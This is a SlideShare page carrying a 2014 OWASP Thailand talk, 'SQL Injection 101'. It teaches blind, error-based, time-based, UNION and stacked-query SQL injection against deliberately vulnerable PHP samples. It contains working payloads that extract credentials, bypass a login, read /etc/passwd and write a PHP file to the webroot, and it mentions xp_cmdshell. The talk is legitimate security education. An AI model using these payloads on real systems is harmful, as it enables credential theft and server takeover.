Ce diaporama a bien été signalé.
Nous utilisons votre profil LinkedIn et vos données d’activité pour vous proposer des publicités personnalisées et pertinentes. Vous pouvez changer vos préférences de publicités à tout moment.
SQL Injection 101 
It is not just about ' or '1'='1 
pichaya@ieee.org 
fb.com/index.htmli 
linkedin.com/in/pich4ya 
Pichay...
Legal Warning 
พระราชบัญญัติ ว่าด้วยการกระทำความผิดเกี่ยวกับคอมพิวเตอร์ พ.ศ. ๒๕๕๐ 
มาตรา 5 
ผู้ใดเข้าถึงโดยมิชอบซึ่งระบบคอ...
Overview 
★ Anatomy of SQL Injection Attack 
★ Injection Techniques 
○ B-E-T-U-S 
★ Privilege Escalation 
○ File & RCE 
★ ...
What is SQL Injection 
“A SQL injection attack consists 
of insertion or "injection" of a 
SQL query via the input data fr...
Very Popular among Hackers
Impact on SQL Injection 
In general, consider SQL Injection a high impact severity. 
Technical Impacts Business Impacts 
★...
Exploitation Complexity 
95% 4% 1% 
Very Hard Lunatic 
Easy (Required 
an Expert) 
(Maze queries, 2nd order, 
Blind, Compl...
A Ton of Tools 
★ Automated SQL injection Tools 
SQLMap, Havij, BBQSQL, SQLNinja, SQLiX, 
BobCat, bSQLHacker, bSQLbf, Absi...
Tool == Super Easy ?
Tool == Super Easy ?
Tools there, why learn to SQLi? 
1. When tools failed to exploit? 
2. False Positive 
★ Complex Database Query 
★ Complex ...
Quote from a Hacker 
“แฮกเกอร์ที่เก่งไม่ใช่แฮกเกอร์ที่ 
แฮกเว็บได้ 1,000 เว็บ แต่เป็น 
แฮกเกอร์ที่แฮกเว็บเดิมได้ 
1,000 คร...
SQL Injection Techniques 
1. Boolean-based blind 
2. Error-based 
3. Time-based blind 
4. UNION query-based 
5. Stacked qu...
Boolean-based blind technique 
★ Inject SQL string to control result to be 
TRUE or FALSE using boolean algebra 
★ You can...
Example of Vulnerable Code 
User Input 
TITLE 
insert into 
SQL query 
TRUE case : title = naruto FALSE case : title = abc...
Boolean-based blind : Probe 
★ title = naruto 
SQL : SELECT * FROM bookshop WHERE title='naruto' 
Result : found (TRUE) 
★...
Boolean-based blind : Exploit 
★ title=naruto' and 'cat'=(if(3>2,'cat','dog'))-- - 
Result: found (TRUE) 
★ title=naruto' ...
Example of Vulnerable Code 
$email=$_POST['email']; 
$password=$_POST['password']; 
$sql="SELECT * FROM users WHERE (email...
Boolean-based blind : Exploit 
password=1' or 
2>(if(mid((select password from users),1,1)='a',1,3))-- - 
HTTP/1.0 401 Una...
Boolean-based blind : Exploit 
password=1' or 
2>(if(mid((select password from users),2,1)='a',1,3))-- - 
HTTP/1.0 401 Una...
Boolean-based blind : Exploit 
Look for automate way ? if the flaw is not too 
complicate then we can just switch to SQLMa...
Error-based : Concept 
★ Inject specially crafted invalid SQL syntax 
★ Ideally, force web application to expose 
Error Me...
Example of Vulnerable Code 
function search_book($title){ 
global $con; 
$sql = "SELECT * FROM bookshop WHERE title='".$ti...
Error-based : Exploit 
http://url/searchbook.php?title=' 
and extractvalue(rand(), 
concat(0x3a, 
(select concat(user(),da...
Error-based : Exploit 
http://url/searchbook.php?title=' 
and extractvalue(rand(), 
concat(0x3a, 
(select concat_ws(0x3a,e...
Time-based blind : Concept 
★ Inject valid SQL string to 
○ wait for few seconds in TRUE 
conditions and … 
○ longer/short...
Example of Vulnerable Code
Time-based blind : Exploit 
newbook.php?title=aaa&author=bbb'+ 
if(ord(mid((select version()),12,1))>108,sleep(5),sleep(10...
Time-based blind : Exploit 
Write a script to automate the attack ! 
For example, http://www.blackhatlibrary.net/SQL_injec...
Time-based blind : Exploit 
sleep() 
executed !
UNION query-based : Concept 
★ Most popular method found in SQL 
injection tutorials from Google/YouTube 
★ Inject valid S...
Example of Vulnerable Code 
Unvalidated parameter ‘author’ 
pass into SQL query
UNION query-based : Exploit 
Step 1 : Find columns of left SELECT statement using ‘ORDER BY’ 
http://owasp-sqli.local/show...
UNION query-based : Exploit 
Step 2.1 : We do not need result from 1st SELECT SQL query so 
discard it with ‘always FALSE’...
UNION query-based : Exploit 
Exploit : http://owasp-sqli. 
local/showbook.php 
?author=longcat' and 1>2 union 
select user...
Stacked Queries : Concept 
★ Append another query into the injection 
★ Not All DBMS drivers/API support 
stacked queries ...
Example of Vulnerable Code
Stacked queries : Exploit
Privilege Escalation 
★ Read credential from configuration files 
★ Create Accessible Web Backdoor 
★ Arbitrary OS command...
SQL Injection : Read File 
Exploit: http://owasp-sqli.local/showbook.php 
?author=longcat' and 1>2 union select 1,load_fil...
SQL Injection : Write File 
Exploit: http://owasp-sqli.local/showbook.php 
?author=longcat' and 1>2 union select 
0x3c3f70...
SQL Injection : OS CMD Shell 
1. Write File > Web Backdoor 
( ex. http://youtube.com/watch?v=QIXTPPBfLyI ) 
2. Built-in OS...
Advanced Attacks 
★ MySQL Second Order SQL Injection 
★ Abusing PHP PDO prepared statements 
★ Making a Backdoor with SQLi...
Next Time :s
Thanks! Need More? 
Good Resources 
https://www.owasp.org/index.php/Testing_for_SQL_Injection_(OTG-INPVAL-005) 
https://ww...
Prochain SlideShare
Chargement dans…5
×

SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto

16 689 vues

Publié le

Topic: SQL Injection 101 : It is not just about ' or '1'='1
Speaker: Pichaya Morimoto
Event: OWASP Thailand Meeting 3/2014
Date: Auguest 28, 2014

Publié dans : Logiciels
  • Login to see the comments

SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto

  1. 1. SQL Injection 101 It is not just about ' or '1'='1 pichaya@ieee.org fb.com/index.htmli linkedin.com/in/pich4ya Pichaya Morimoto
  2. 2. Legal Warning พระราชบัญญัติ ว่าด้วยการกระทำความผิดเกี่ยวกับคอมพิวเตอร์ พ.ศ. ๒๕๕๐ มาตรา 5 ผู้ใดเข้าถึงโดยมิชอบซึ่งระบบคอมพิวเตอร์ที่มีมาตรการป้องกันการเข้าถึงโดยเฉ พาะและมาตรการนั้นมิได้มีไว้สำหรับตน โทษจำคุกไม่เกิน 6 เดือน หรือปรับไม่เกิน 10,000 บาท มาตรา 7 ผู้ใดเข้าถึงโดยมิชอบซึ่งข้อมูลคอมพิวเตอร์ที่มีมาตรการป้องกันการเข้าถึงโดยเฉ พาะ และมาตรการนั้นมิได้มีไว้สำหรับตน โทษจำคุกไม่เกิน 2 ปี หรือปรับไม่เกิน 40,000 บาท มาตรา 9 ผู้ใดทำให้เสียหาย ทำลาย แก้ไข เปลี่ยนแปลง หรือเพิ่มเติมไม่ว่าทั้งหมดหรือ บางส่วน ซึ่งข้อมูลคอมพิวเตอร์ของผู้อื่นโดยมิชอบ โทษจำคุกไม่เกิน 5 ปี หรือปรับไม่เกิน 100,000 บาท
  3. 3. Overview ★ Anatomy of SQL Injection Attack ★ Injection Techniques ○ B-E-T-U-S ★ Privilege Escalation ○ File & RCE ★ Advanced Attacks ★ Case Studies
  4. 4. What is SQL Injection “A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application.” - https://www.owasp.org/index.php/SQL_Injection Web Application User inject a specially crafted SQL as input to manipulate results Application Users via client programs Input Entry Points (Search box, Forms, Article ID, Session ID, HTTP headers etc.) Database
  5. 5. Very Popular among Hackers
  6. 6. Impact on SQL Injection In general, consider SQL Injection a high impact severity. Technical Impacts Business Impacts ★ Data losses ★ Bypass Authentications ★ Denial of access ★ Lead to host takeover ★ All data could be stolen, modified, or deleted. ★ Could your reputation be harmed? * https://www.owasp.org/index.php/Top_10_2013-A1-Injection * https://www.owasp.org/index.php/SQL_Injection
  7. 7. Exploitation Complexity 95% 4% 1% Very Hard Lunatic Easy (Required an Expert) (Maze queries, 2nd order, Blind, Complex App Logic, Bypass Filters/WAF etc.) SQL injection with Havij by 3 year old
  8. 8. A Ton of Tools ★ Automated SQL injection Tools SQLMap, Havij, BBQSQL, SQLNinja, SQLiX, BobCat, bSQLHacker, bSQLbf, Absinthe, SQLBrute, Squeeza, SQL Power Injector etc. ★ Web Vulnerability Scanner ○ Commercial Acunetix, Netsparker, IBM AppScan,HP Fortify, HP WebInspect, BurpSuite Pro, Qualys WAS etc. ○ Free W3af, Nikto, SkipFish, Vega, OWASP ZAP etc.
  9. 9. Tool == Super Easy ?
  10. 10. Tool == Super Easy ?
  11. 11. Tools there, why learn to SQLi? 1. When tools failed to exploit? 2. False Positive ★ Complex Database Query ★ Complex Application Logic ★ Encodings & Blacklist Filters ★ Post Authen-ed ★ Anti-CSRF Token ★ Non-SELECT statements ★ Programmer is so indy 3. It’s just fun, and sometimes can make good money... In case you are penetration tester, or just a Zero-day hunter ;) Popular websites already scanned by those available tools. It is very challenge, if you can find flaws that overlooked by tools.
  12. 12. Quote from a Hacker “แฮกเกอร์ที่เก่งไม่ใช่แฮกเกอร์ที่ แฮกเว็บได้ 1,000 เว็บ แต่เป็น แฮกเกอร์ที่แฮกเว็บเดิมได้ 1,000 ครั้ง โดยที่โดน แพทช์ไปแล้วทุกครั้ง” ตาเล็ก Windows98SE
  13. 13. SQL Injection Techniques 1. Boolean-based blind 2. Error-based 3. Time-based blind 4. UNION query-based 5. Stacked queries
  14. 14. Boolean-based blind technique ★ Inject SQL string to control result to be TRUE or FALSE using boolean algebra ★ You can determine whether T/F based on analysis of HTTP responses (string/regex/page length/HTTP status) ★ Retrieve arbitrary data: ○ Sub-Queries with “SELECT” + Conditions (CASE-WHEN, IF-THEN)
  15. 15. Example of Vulnerable Code User Input TITLE insert into SQL query TRUE case : title = naruto FALSE case : title = abc123
  16. 16. Boolean-based blind : Probe ★ title = naruto SQL : SELECT * FROM bookshop WHERE title='naruto' Result : found (TRUE) ★ title = abc123 SQL : SELECT * FROM bookshop WHERE title='abc123' Result : not found (FALSE) ★ title = naruto' and '1'='1 SQL : ..WHERE title='naruto' and '1'='1' Result : found (TRUE) ★ title = naruto' and 1=2-- - SQL : ..WHERE title='naruto' and 1=2-- -' Result : found (FALSE) Insert another TRUE condition connected with ‘AND’ operator MySQL comments -- - # /**/ T & T = T T & F = F
  17. 17. Boolean-based blind : Exploit ★ title=naruto' and 'cat'=(if(3>2,'cat','dog'))-- - Result: found (TRUE) ★ title=naruto' and 'cat'=(if(1>5,'cat','dog'))-- - Result: not found (FALSE) ★ title=naruto' and 'cat'= (if(database()='owasp_db','cat','dog'))-- - Result: found (TRUE) ★ title=naruto' and 'cat'= (if(mid(database(),1,1)='a','cat','dog'))-- - Result: not found (not starts with ‘a’) … b … c ... ★ title=naruto' and 'cat'= (if(mid(database(),1,1)='o','cat','dog'))-- - MySQL IF function IF( <condition>, <return when TRUE>, <return when FALSE> ) MySQL substring functions 1. SUBSTRING (str, pos, len) 2. SUBSTR (str, pos, len) 3. MID(str, pos, len) Result: found (starts with ‘o’), then go to next character.
  18. 18. Example of Vulnerable Code $email=$_POST['email']; $password=$_POST['password']; $sql="SELECT * FROM users WHERE (email='$email')"; $sql.=" AND (password='$password')"; $result = mysql_query($sql); if(mysql_num_rows($result)){ die(header('location: member.php')); }else{ die(header('HTTP/1.0 401 Unauthorized')); } True (Login successful) HTTP/1.1 302 Found location: member.php False (Login failed) HTTP/1.0 401 Unauthorized Unvalidated User Input Exploit: curl -v http://url/login.php -d "email=a&password=')||(2>'1" … WHERE (email='a') AND (password='')||(2>'1') Always TRUE
  19. 19. Boolean-based blind : Exploit password=1' or 2>(if(mid((select password from users),1,1)='a',1,3))-- - HTTP/1.0 401 Unauthorized Char Pos : 1 password=1' or from first record of password column 2>(if(mid((select password from users),1,1)='b',1,3))-- - HTTP/1.0 401 Unauthorized ... password=1' or 2>(if(mid((select password from users),1,1)='t',1,3))-- - HTTP/1.1 302 Found location: member.php If Char Pos 1 equals to ‘a’ then return 1, otherwise return 3 When result is in TRUE case that means 1st char is current value ( ‘t’ )
  20. 20. Boolean-based blind : Exploit password=1' or 2>(if(mid((select password from users),2,1)='a',1,3))-- - HTTP/1.0 401 Unauthorized Go To next Repeat steps until you character get all text from the results! Tip: Find length(<query>)
  21. 21. Boolean-based blind : Exploit Look for automate way ? if the flaw is not too complicate then we can just switch to SQLMap. But keep in mind, there are A LOT of tricky patterns that tools cannot figure out how to evaluate as TRUE or FALSE, so just write your own script! Faster blind test algorithms: ★ Bisection algorithm (binary search) ★ Bit-shift algorithm ★ Regular Expression search
  22. 22. Error-based : Concept ★ Inject specially crafted invalid SQL syntax ★ Ideally, force web application to expose Error Message which contains the injection results ★ Methods depend solely on DBMS ★ Rarely found in production webapps
  23. 23. Example of Vulnerable Code function search_book($title){ global $con; $sql = "SELECT * FROM bookshop WHERE title='".$title."'"; $result = mysql_query($sql) or die(mysql_error($con)); if(mysql_num_rows($result)){ return 'found'; }else{ return 'not found'; } Show Database Error Message when query result in an error } $book_title = $_GET['title']; $book_status = search_book($book_title); echo '<h1>Result: '.$book_status.'</h1>';
  24. 24. Error-based : Exploit http://url/searchbook.php?title=' and extractvalue(rand(), concat(0x3a, (select concat(user(),database())) ))-- -
  25. 25. Error-based : Exploit http://url/searchbook.php?title=' and extractvalue(rand(), concat(0x3a, (select concat_ws(0x3a,email,password) from users limit 2,1) ))-- - Caution Error messages has limit number of allowed length, so what? length() + mid() ;)
  26. 26. Time-based blind : Concept ★ Inject valid SQL string to ○ wait for few seconds in TRUE conditions and … ○ longer/shorter delay for FALSE ★ Analysis on response time to determine the result of queries ★ Take long time to get result but very useful to hack completely blind flaws
  27. 27. Example of Vulnerable Code
  28. 28. Time-based blind : Exploit newbook.php?title=aaa&author=bbb'+ if(ord(mid((select version()),12,1))>108,sleep(5),sleep(10)))--+- SQL: INSERT INTO bookshop(title,author) values ('aaa','bbb'+if(ord(mid((select version()),12,1)) >108,sleep(5),sleep(10)))-- -') TRUE case : sleep(5) , delay 5 seconds FALSE case : sleep(10), delay 10 seconds Delay 5 seconds
  29. 29. Time-based blind : Exploit Write a script to automate the attack ! For example, http://www.blackhatlibrary.net/SQL_injection/mysqli-blindutils/sqli-slee.py
  30. 30. Time-based blind : Exploit sleep() executed !
  31. 31. UNION query-based : Concept ★ Most popular method found in SQL injection tutorials from Google/YouTube ★ Inject valid SQL string by making the left-side SELECT to be false and then insert “UNION” with another right-side SELECT query using same number of columns contain what you want to fetch.
  32. 32. Example of Vulnerable Code Unvalidated parameter ‘author’ pass into SQL query
  33. 33. UNION query-based : Exploit Step 1 : Find columns of left SELECT statement using ‘ORDER BY’ http://owasp-sqli.local/showbook.php?author=longcat' order by 1-- - There are column no. 1 - 4 in underlying SELECT query There is no 5th column. If db error msg on, u will see: Unknown column '5' in 'order clause'
  34. 34. UNION query-based : Exploit Step 2.1 : We do not need result from 1st SELECT SQL query so discard it with ‘always FALSE’ condition. http://owasp-sqli.local/showbook.php?author=longcat' and 1>2-- - Step 2.2 : Insert 2nd SELECT SQL query separated by UNION http://owasp-sqli.local/showbook.php?author=longcat' and 1>2 UNION select 1,2,3,4-- - Result of “SELECT 1,2,3,4” will replace where the result of 1st SELECT was.
  35. 35. UNION query-based : Exploit Exploit : http://owasp-sqli. local/showbook.php ?author=longcat' and 1>2 union select user(),database(),version(), (select group_concat(email, password) from users)--+- Tips: Database Meta Data select database() select table_name from information_schema.tables select column_name from information_schema.columns
  36. 36. Stacked Queries : Concept ★ Append another query into the injection ★ Not All DBMS drivers/API support stacked queries ★ Very Effective for MS-SQL, SQLite Attack Scenario: User Input = 123 SQL: SELECT email FROM users where id=123 User Input = 456; DROP table users SQL: ... users where id=456; DROP table users
  37. 37. Example of Vulnerable Code
  38. 38. Stacked queries : Exploit
  39. 39. Privilege Escalation ★ Read credential from configuration files ★ Create Accessible Web Backdoor ★ Arbitrary OS command execution
  40. 40. SQL Injection : Read File Exploit: http://owasp-sqli.local/showbook.php ?author=longcat' and 1>2 union select 1,load_file('/etc/passwd'),3,4--+-
  41. 41. SQL Injection : Write File Exploit: http://owasp-sqli.local/showbook.php ?author=longcat' and 1>2 union select 0x3c3f70687020706870696e666f28293b203f3e,null,null,null into outfile '/var/www/owasp-sqli.local/public_html/upload/info.php'--+-
  42. 42. SQL Injection : OS CMD Shell 1. Write File > Web Backdoor ( ex. http://youtube.com/watch?v=QIXTPPBfLyI ) 2. Built-in OS command functions / UDF MS-SQL xp_cmdshell
  43. 43. Advanced Attacks ★ MySQL Second Order SQL Injection ★ Abusing PHP PDO prepared statements ★ Making a Backdoor with SQLite ★ How a hashed string causes SQL Injection flaw ★ Account Takeover with SQL Truncation Attack ★ CodeIgniter Active Record Bypass
  44. 44. Next Time :s
  45. 45. Thanks! Need More? Good Resources https://www.owasp.org/index.php/Testing_for_SQL_Injection_(OTG-INPVAL-005) https://www.owasp.org/index.php/Blind_SQL_Injection http://websec.ca/kb/sql_injection https://github.com/sqlmapproject/sqlmap http://www.amazon.com/Injection-Attacks-Defense-Second-Edition/dp/1597499633 Build your own SQL Injection Playground https://github.com/SpiderLabs/MCIR/tree/master/sqlol https://github.com/Audi-1/sqli-labs https://github.com/sqlmapproject/testenv https://www.owasp.org/index. php/OWASP_Broken_Web_Applications_Project https://pentesterlab.com/exercises/web_for_pentester/ https://pentesterlab.com/exercises/from_sqli_to_shell_II/ https://pentesterlab. com/exercises/from_sqli_to_shell_pg_edition/

×